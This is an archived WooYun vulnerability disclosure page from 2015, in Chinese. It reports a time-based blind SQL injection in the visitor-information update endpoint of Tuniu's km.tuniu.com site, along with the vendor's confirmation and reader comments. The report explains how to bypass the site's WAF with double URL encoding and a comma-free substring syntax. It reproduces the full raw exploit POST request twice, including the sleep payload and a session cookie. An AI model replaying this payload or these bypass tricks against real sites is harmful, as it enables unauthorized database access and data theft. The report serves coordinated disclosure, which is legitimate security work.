当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092612

漏洞标题:途牛主站延时注入+waf绕过

相关厂商:途牛旅游网

漏洞作者: Matt

提交时间:2015-01-19 09:15

修复时间:2015-03-05 09:16

公开时间:2015-03-05 09:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-03-05: 细节向公众公开

简要描述:

途牛主站延时注入+waf绕过

详细说明:

途牛在修改游客信息的地方存在update注入,但是因为有waf加上不能出现,因为update的信息是根据,来分割的
waf的绕过容易,二次url编码就可以了

tuniu注入1.png


然后是因为不能出现,所以这边忙注也比较困难
但是可以用substring('r' from 1 for 1)
这样的语句就不会出现,了,并且可以正常的获取数据,
虽然这个点利用起来比较困难,但是还是可以利用,附上我之前测试的包

POST /main.php?do=online_book_do_visitor HTTP/1.1
Host: km.tuniu.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://km.tuniu.com/main.php?do=online_book_visitor&order_id=4550094
Content-Length: 285
Cookie: p_phone_400=4007-999-999; PHPSESSID=8v1dgvcbbm0elnoprf91chnfv7; tuniu_channel=MTAwLDAsZDdiY2U0NTViYjViMDFhNWExYzk1YTM2ZjZiNDEyY2Q%3D; tuniuuser_citycode=MzMwMg%3D%3D; s_cc=true; s_nr=1421595835812; s_sq=%5B%5BB%5D%5D; __utma=1.151979505.1421595199.1421595199.1421595199.1; __utmb=1.170.9.1421599758357; __utmc=1; __utmz=1.1421595199.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _tacau=MCxmMWJlYWNiMS03N2M1LTQ0ZjEtOThlMC0wYzc5ZWE2ZTRjMmQs; _tact=Y2UyNzU5NmMtMDIxNS0yMjFjLTgzYjItMDgxODUyOTM0ODVm; _tacz2=taccsr%3D%28direct%29%7Ctacccn%3D%28none%29%7Ctaccmd%3D%28none%29%7Ctaccct%3D%28none%29%7Ctaccrt%3D%28none%29; _taca=1421595199130.1421595199130.1421595199130.1; _tacb=NGYzNDkyNWMtY2ZlNi05MmJjLTA4MDAtOTgxMmFlYjRlZTkx; _tacc=1; tuniuuser_ip_citycode=MjAw; tuniuuser=NzczODQ4Niw2ODIzNjEzODU5LDY4MjM2MTM4NTkmcXVvdDsmYW1wO2d0O3M7JiMwMzk7LDAsMTQyMTU5NTQzMiw5ZjY0OTg2YzdkYzE0NzM0ZDEwZGFiZjM2NWYyMDBlOQ%3D%3D; tuniusub=1; tuniuuser_image=aHR0cDovL20udHVuaXVjZG4uY29tL2ZpbGVicm9rZXIvY2RuL3ByZC83NS8wYy83NTBjMmRhYmFhZjRmYjY4ZjI2NzVlM2NlZjA1YmM2ZC5wbmc%3D; tuniuuser_vip=MA%3D%3D; tuniuuser_level=MA%3D%3D; tuniuuser_id=7738486; tuniuuser_name=NjgyMzYxMzg1OSZxdW90OyZhbXA7Z3Q7czsmIzAzOTs%3D; Hm_lvt_dbdbb8d9c6cd72876c254897549e524b=1421503111,1421591375,1421594808,1421595437; Hm_lpvt_dbdbb8d9c6cd72876c254897549e524b=1421597431; tuniu_app_cc=list_three_days; tuniu_zeus=MzNfMV8yXzFfMV83OjpodHRwOi8vd3d3LnR1bml1LmNvbS9zdGF0aWMveW91amkvOjoyMDE1LTAxLTE4IDIzOjM5OjE0%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly90b3AudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0NTozMA%3D%3D%2CMTFfMl8xXzJfNV8xOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTggMjM6NDY6MDg%3D%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly93d3cudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0ODozNQ%3D%3D%2CMTJfMl8xXzFfMl8zOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTkgMDA6NDk6MTg%3D; visit_history=5186662%2C780023%2C; _um_uuid=f7a45f3da941376f5abce7a65b613f27; __ozlvd1940=1421602934; tuniu_is_login=MQ%3D%3D; tuniu_newer=set_one_day; Hm_lvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421253828,1421597324; Hm_lpvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421597366; appdown=1; TUNIUmuser=1c80b2cffeddb233b6a4fbfddb375c15; tuniu_partner=MTAxLDAsLDlmZDgyZThjYTZkNGMwMTlmZTUyNzdlYjJmNTcxYzQ1; pgv_pvi=3638345589; pgv_info=ssi=s4790786375; tel_400=4007996820; PageSwitch=2%2C1429375904; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
visitor_info=123,33071919680425367s1l'+and+sleep%252811%2529+and+'1,1,1968-04-25,1s331s<xx>322313312,,0000-00-00,,请é??æ%8B%A9%2C%E8%AF%B7%E9%80%89%E6%8B%A9%2C0%2C1%2C0000-00-00%2C0%2C1%2C0000-00-00%2C%E8%AF%B7%E9%80%89%E6%8B%A9%2C%2C6530909%2C%3B&order_type=&order_id=4550094

漏洞证明:

途牛在修改游客信息的地方存在update注入,但是因为有waf加上不能出现,因为update的信息是根据,来分割的
waf的绕过容易,二次url编码就可以了

tuniu注入1.png


然后是因为不能出现,所以这边忙注也比较困难
但是可以用substring('r' from 1 for 1)
这样的语句就不会出现,了,并且可以正常的获取数据,
虽然这个点利用起来比较困难,但是还是可以利用,附上我之前测试的包

POST /main.php?do=online_book_do_visitor HTTP/1.1
Host: km.tuniu.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://km.tuniu.com/main.php?do=online_book_visitor&order_id=4550094
Content-Length: 285
Cookie: p_phone_400=4007-999-999; PHPSESSID=8v1dgvcbbm0elnoprf91chnfv7; tuniu_channel=MTAwLDAsZDdiY2U0NTViYjViMDFhNWExYzk1YTM2ZjZiNDEyY2Q%3D; tuniuuser_citycode=MzMwMg%3D%3D; s_cc=true; s_nr=1421595835812; s_sq=%5B%5BB%5D%5D; __utma=1.151979505.1421595199.1421595199.1421595199.1; __utmb=1.170.9.1421599758357; __utmc=1; __utmz=1.1421595199.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _tacau=MCxmMWJlYWNiMS03N2M1LTQ0ZjEtOThlMC0wYzc5ZWE2ZTRjMmQs; _tact=Y2UyNzU5NmMtMDIxNS0yMjFjLTgzYjItMDgxODUyOTM0ODVm; _tacz2=taccsr%3D%28direct%29%7Ctacccn%3D%28none%29%7Ctaccmd%3D%28none%29%7Ctaccct%3D%28none%29%7Ctaccrt%3D%28none%29; _taca=1421595199130.1421595199130.1421595199130.1; _tacb=NGYzNDkyNWMtY2ZlNi05MmJjLTA4MDAtOTgxMmFlYjRlZTkx; _tacc=1; tuniuuser_ip_citycode=MjAw; tuniuuser=NzczODQ4Niw2ODIzNjEzODU5LDY4MjM2MTM4NTkmcXVvdDsmYW1wO2d0O3M7JiMwMzk7LDAsMTQyMTU5NTQzMiw5ZjY0OTg2YzdkYzE0NzM0ZDEwZGFiZjM2NWYyMDBlOQ%3D%3D; tuniusub=1; tuniuuser_image=aHR0cDovL20udHVuaXVjZG4uY29tL2ZpbGVicm9rZXIvY2RuL3ByZC83NS8wYy83NTBjMmRhYmFhZjRmYjY4ZjI2NzVlM2NlZjA1YmM2ZC5wbmc%3D; tuniuuser_vip=MA%3D%3D; tuniuuser_level=MA%3D%3D; tuniuuser_id=7738486; tuniuuser_name=NjgyMzYxMzg1OSZxdW90OyZhbXA7Z3Q7czsmIzAzOTs%3D; Hm_lvt_dbdbb8d9c6cd72876c254897549e524b=1421503111,1421591375,1421594808,1421595437; Hm_lpvt_dbdbb8d9c6cd72876c254897549e524b=1421597431; tuniu_app_cc=list_three_days; tuniu_zeus=MzNfMV8yXzFfMV83OjpodHRwOi8vd3d3LnR1bml1LmNvbS9zdGF0aWMveW91amkvOjoyMDE1LTAxLTE4IDIzOjM5OjE0%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly90b3AudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0NTozMA%3D%3D%2CMTFfMl8xXzJfNV8xOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTggMjM6NDY6MDg%3D%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly93d3cudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0ODozNQ%3D%3D%2CMTJfMl8xXzFfMl8zOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTkgMDA6NDk6MTg%3D; visit_history=5186662%2C780023%2C; _um_uuid=f7a45f3da941376f5abce7a65b613f27; __ozlvd1940=1421602934; tuniu_is_login=MQ%3D%3D; tuniu_newer=set_one_day; Hm_lvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421253828,1421597324; Hm_lpvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421597366; appdown=1; TUNIUmuser=1c80b2cffeddb233b6a4fbfddb375c15; tuniu_partner=MTAxLDAsLDlmZDgyZThjYTZkNGMwMTlmZTUyNzdlYjJmNTcxYzQ1; pgv_pvi=3638345589; pgv_info=ssi=s4790786375; tel_400=4007996820; PageSwitch=2%2C1429375904; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
visitor_info=123,33071919680425367s1l'+and+sleep%252811%2529+and+'1,1,1968-04-25,1s331s<xx>322313312,,0000-00-00,,请é??æ%8B%A9%2C%E8%AF%B7%E9%80%89%E6%8B%A9%2C0%2C1%2C0000-00-00%2C0%2C1%2C0000-00-00%2C%E8%AF%B7%E9%80%89%E6%8B%A9%2C%2C6530909%2C%3B&order_type=&order_id=4550094

修复方案:

你猜

版权声明:转载请注明来源 Matt@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-19 09:28

厂商回复:

感谢提交,我们及时修复

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-19 09:42 | feng ( 普通白帽子 | Rank:664 漏洞数:70 | 想刷个6D)

    nb

  2. 2015-01-19 09:47 | GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)

    牛逼

  3. 2015-01-19 10:16 | luwikes ( 普通白帽子 | Rank:512 漏洞数:68 | 潜心学习~~~)

    这。。。

  4. 2015-01-19 10:24 | 途牛旅游网(乌云厂商)

    拿不到有效数据。只是会造并发上升。

  5. 2015-08-18 16:47 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    吊吊吊